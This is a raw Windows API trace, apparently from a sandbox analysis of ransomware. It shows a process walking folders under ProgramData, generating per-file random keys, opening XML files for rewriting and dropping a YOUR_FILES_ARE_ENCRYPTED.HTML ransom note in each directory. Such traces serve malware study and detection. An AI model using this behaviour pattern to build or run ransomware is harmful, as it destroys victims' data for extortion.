[0106.202] CloseHandle (hObject=0x32c) returned 1 [0106.203] GetProcessHeap () returned 0x600000 [0106.203] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d57c8 | out: hHeap=0x600000) returned 1 [0106.203] GetProcessHeap () returned 0x600000 [0106.203] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0106.204] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5026e6f8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5026e6f8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5026e6f8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd0a3, dwReserved0=0x63644e, dwReserved1=0x6363f0, cFileName="folder.ico", cAlternateFileName="")) returned 1 [0106.204] StrStrIW (lpFirst="folder.ico", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.204] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico") returned 96 [0106.204] PathFindExtensionW (pszPath="folder.ico") returned=".ico" [0106.204] lstrlenW (lpString=".ico") returned 4 [0106.204] PathFindExtensionW (pszPath="folder.ico") returned=".ico" [0106.204] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5026e6f8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5026e6f8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5026e6f8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x72ee, dwReserved0=0x63644e, dwReserved1=0x6363f0, cFileName="netfol.ico", cAlternateFileName="")) returned 1 [0106.205] StrStrIW (lpFirst="netfol.ico", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.205] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico") returned 96 [0106.205] PathFindExtensionW (pszPath="netfol.ico") returned=".ico" [0106.205] lstrlenW (lpString=".ico") returned 4 [0106.205] PathFindExtensionW (pszPath="netfol.ico") returned=".ico" [0106.205] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5029494e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5029494e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5029494e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x14668, dwReserved0=0x63644e, dwReserved1=0x6363f0, cFileName="pictures.ico", cAlternateFileName="")) returned 1 [0106.205] StrStrIW (lpFirst="pictures.ico", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.205] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico") returned 98 [0106.205] PathFindExtensionW (pszPath="pictures.ico") returned=".ico" [0106.205] lstrlenW (lpString=".ico") returned 4 [0106.205] PathFindExtensionW (pszPath="pictures.ico") returned=".ico" [0106.205] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5029494e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5029494e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5029494e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x536, dwReserved0=0x63644e, dwReserved1=0x6363f0, cFileName="resource.xml", cAlternateFileName="")) returned 1 [0106.205] StrStrIW (lpFirst="resource.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.205] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml") returned 98 [0106.205] PathFindExtensionW (pszPath="resource.xml") returned=".xml" [0106.205] lstrlenW (lpString=".xml") returned 4 [0106.205] PathFindExtensionW (pszPath="resource.xml") returned=".xml" [0106.205] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0106.205] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0106.205] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5029494e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5029494e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5029494e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xcaa9, dwReserved0=0x63644e, dwReserved1=0x6363f0, cFileName="ringtones.ico", cAlternateFileName="")) returned 1 [0106.205] StrStrIW (lpFirst="ringtones.ico", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.205] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico") returned 99 [0106.205] PathFindExtensionW (pszPath="ringtones.ico") returned=".ico" [0106.206] lstrlenW (lpString=".ico") returned 4 [0106.206] PathFindExtensionW (pszPath="ringtones.ico") returned=".ico" [0106.206] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5029494e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5029494e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5029494e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x10850, dwReserved0=0x63644e, dwReserved1=0x6363f0, cFileName="settings.ico", cAlternateFileName="")) returned 1 [0106.206] StrStrIW (lpFirst="settings.ico", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.206] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico") returned 98 [0106.206] PathFindExtensionW (pszPath="settings.ico") returned=".ico" [0106.206] lstrlenW (lpString=".ico") returned 4 [0106.206] PathFindExtensionW (pszPath="settings.ico") returned=".ico" [0106.206] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5029494e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5029494e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5029494e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc04b, dwReserved0=0x63644e, dwReserved1=0x6363f0, cFileName="sync.ico", cAlternateFileName="")) returned 1 [0106.206] StrStrIW (lpFirst="sync.ico", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.206] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico") returned 94 [0106.206] PathFindExtensionW (pszPath="sync.ico") returned=".ico" [0106.206] lstrlenW (lpString=".ico") returned 4 [0106.206] PathFindExtensionW (pszPath="sync.ico") returned=".ico" [0106.206] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5026e6f8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5026e6f8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5026e6f8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2aff, dwReserved0=0x63644e, dwReserved1=0x6363f0, cFileName="tasks.xml", cAlternateFileName="")) returned 1 [0106.206] StrStrIW (lpFirst="tasks.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.206] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml") returned 95 [0106.206] PathFindExtensionW (pszPath="tasks.xml") returned=".xml" [0106.206] lstrlenW (lpString=".xml") returned 4 [0106.206] PathFindExtensionW (pszPath="tasks.xml") returned=".xml" [0106.206] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0106.206] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0106.207] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5029494e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5029494e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5029494e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1b9f4, dwReserved0=0x63644e, dwReserved1=0x6363f0, cFileName="wmp.ico", cAlternateFileName="")) returned 1 [0106.207] StrStrIW (lpFirst="wmp.ico", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.207] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico") returned 93 [0106.207] PathFindExtensionW (pszPath="wmp.ico") returned=".ico" [0106.207] lstrlenW (lpString=".ico") returned 4 [0106.207] PathFindExtensionW (pszPath="wmp.ico") returned=".ico" [0106.207] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5029494e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5029494e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5029494e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1b9f4, dwReserved0=0x63644e, dwReserved1=0x6363f0, cFileName="wmp.ico", cAlternateFileName="")) returned 0 [0106.207] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0106.208] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 115 [0106.208] GetProcessHeap () returned 0x600000 [0106.208] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0106.208] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0106.208] WriteFile (in: hFile=0x304, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19eab8, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19eab8*=0x3c00, lpOverlapped=0x0) returned 1 [0106.210] CloseHandle (hObject=0x304) returned 1 [0106.210] GetProcessHeap () returned 0x600000 [0106.210] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0106.210] GetProcessHeap () returned 0x600000 [0106.210] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6c47b8 | out: hHeap=0x600000) returned 1 [0106.211] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd313219, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd313219, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x630688, dwReserved1=0xe87ea9, cFileName="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", cAlternateFileName="{E35BE~1")) returned 1 [0106.211] StrStrIW (lpFirst="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.211] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}") returned 85 [0106.211] GetProcessHeap () returned 0x600000 [0106.211] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6c47b8 [0106.212] lstrcpyW (in: lpString1=0x6c47b8, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}" [0106.212] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*" [0106.212] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd313219, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd313219, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63644e, dwReserved1=0x6363f0, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0106.214] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd313219, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd313219, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63644e, dwReserved1=0x6363f0, cFileName="..", cAlternateFileName="")) returned 1 [0106.214] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd313219, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd313219, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd313219, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63644e, dwReserved1=0x6363f0, cFileName="en-US", cAlternateFileName="")) returned 1 [0106.214] StrStrIW (lpFirst="en-US", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.214] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US") returned 91 [0106.214] GetProcessHeap () returned 0x600000 [0106.214] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0106.215] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US" [0106.215] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\*" [0106.215] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd313219, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd313219, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd313219, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x19e5b0, cFileName=".", cAlternateFileName="")) returned 0x6265f8 [0106.216] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd313219, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd313219, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd313219, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x19e5b0, cFileName="..", cAlternateFileName="")) returned 1 [0106.216] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9f57a684, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0x9f57a684, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0x9f57a684, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x5e8, dwReserved0=0x63d090, dwReserved1=0x19e5b0, cFileName="resource.xml", cAlternateFileName="")) returned 1 [0106.216] StrStrIW (lpFirst="resource.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.216] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml") returned 104 [0106.216] PathFindExtensionW (pszPath="resource.xml") returned=".xml" [0106.216] lstrlenW (lpString=".xml") returned 4 [0106.216] PathFindExtensionW (pszPath="resource.xml") returned=".xml" [0106.216] SystemFunction036 (in: RandomBuffer=0x19e480, RandomBufferLength=0x20 | out: RandomBuffer=0x19e480) returned 1 [0106.216] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\resource.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0106.216] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9f57a684, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0x9f57a684, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0x9f57a684, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x5e8, dwReserved0=0x63d090, dwReserved1=0x19e5b0, cFileName="resource.xml", cAlternateFileName="")) returned 0 [0106.216] FindClose (in: hFindFile=0x6265f8 | out: hFindFile=0x6265f8) returned 1 [0106.217] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 121 [0106.217] GetProcessHeap () returned 0x600000 [0106.217] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d57c8 [0106.217] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0106.217] WriteFile (in: hFile=0x32c, lpBuffer=0x6d57c8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x6d57c8*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0106.219] CloseHandle (hObject=0x32c) returned 1 [0106.222] GetProcessHeap () returned 0x600000 [0106.222] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d57c8 | out: hHeap=0x600000) returned 1 [0106.222] GetProcessHeap () returned 0x600000 [0106.222] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0106.223] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2136a4c1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2136a4c1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2136a4c1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd0a3, dwReserved0=0x63644e, dwReserved1=0x6363f0, cFileName="folder.ico", cAlternateFileName="")) returned 1 [0106.223] StrStrIW (lpFirst="folder.ico", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.223] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico") returned 96 [0106.223] PathFindExtensionW (pszPath="folder.ico") returned=".ico" [0106.223] lstrlenW (lpString=".ico") returned 4 [0106.223] PathFindExtensionW (pszPath="folder.ico") returned=".ico" [0106.223] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2136a4c1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2136a4c1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2136a4c1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xe3c8, dwReserved0=0x63644e, dwReserved1=0x6363f0, cFileName="print_pref.ico", cAlternateFileName="")) returned 1 [0106.223] StrStrIW (lpFirst="print_pref.ico", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.223] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico") returned 100 [0106.223] PathFindExtensionW (pszPath="print_pref.ico") returned=".ico" [0106.223] lstrlenW (lpString=".ico") returned 4 [0106.223] PathFindExtensionW (pszPath="print_pref.ico") returned=".ico" [0106.223] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2136a4c1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2136a4c1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2136a4c1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xebb8, dwReserved0=0x63644e, dwReserved1=0x6363f0, cFileName="print_property.ico", cAlternateFileName="")) returned 1 